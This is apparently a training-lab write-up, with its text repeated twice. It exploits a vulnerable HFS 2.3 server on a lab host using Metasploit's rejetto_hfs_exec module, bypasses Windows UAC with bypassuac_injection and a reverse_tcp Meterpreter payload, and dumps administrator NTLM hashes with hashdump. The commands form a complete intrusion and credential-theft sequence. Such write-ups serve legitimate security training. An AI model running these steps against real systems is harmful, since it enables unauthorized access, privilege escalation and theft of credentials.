UAC Bypass: Memory Injection (Metasploit)

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable server will be accessible at demo.ine.local.

Your task is to fingerprint the application using the tools available on the Kali machine and exploit the application using the appropriate Metasploit module. And then, bypass UAC using the Memory Injection Metasploit local exploit module.

Objective: Gain the highest privilege on the compromised machine and get administrator user NTLM hash.

Tools

The best tools for this lab are:

Nmap
Metasploit Framework

Writeup

nmap -sSVC demo.ine.local

PORT      STATE SERVICE            VERSION
80/tcp    open  http               HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: VICTIM
|   NetBIOS_Domain_Name: VICTIM
|   NetBIOS_Computer_Name: VICTIM
|   DNS_Domain_Name: victim
|   DNS_Computer_Name: victim
|   Product_Version: 6.3.9600
|_  System_Time: 2025-06-10T17:39:06+00:00
|_ssl-date: 2025-06-10T17:39:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=victim
| Not valid before: 2025-06-09T17:36:10
|_Not valid after:  2025-12-09T17:36:10
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-10T17:39:09
|_  start_date: 2025-06-10T17:36:07
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

msfconsole
use exploit/windows/http/rejetto_hfs_exec
set rhosts demo.ine.local
run

ps -S explorer.exe
migrate 2124
shell
net localgroup administrators
Ctrl + C
background
use exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

hashdump

PreviousWindows Post Exploitation Modules NextExploiting SMB With PsExec

Last updated 4 days ago

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable server will be accessible at demo.ine.local.

Objective: Gain the highest privilege on the compromised machine and get administrator user NTLM hash.

Writeup

nmap -sSVC demo.ine.local

PORT      STATE SERVICE            VERSION
80/tcp    open  http               HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: VICTIM
|   NetBIOS_Domain_Name: VICTIM
|   NetBIOS_Computer_Name: VICTIM
|   DNS_Domain_Name: victim
|   DNS_Computer_Name: victim
|   Product_Version: 6.3.9600
|_  System_Time: 2025-06-10T17:39:06+00:00
|_ssl-date: 2025-06-10T17:39:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=victim
| Not valid before: 2025-06-09T17:36:10
|_Not valid after:  2025-12-09T17:36:10
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-10T17:39:09
|_  start_date: 2025-06-10T17:36:07
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

msfconsole
use exploit/windows/http/rejetto_hfs_exec
set rhosts demo.ine.local
run

ps -S explorer.exe
migrate 2124
shell
net localgroup administrators
Ctrl + C
background
use exploit/windows/local/bypassuac_injection
set session 1
set TARGET 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

hashdump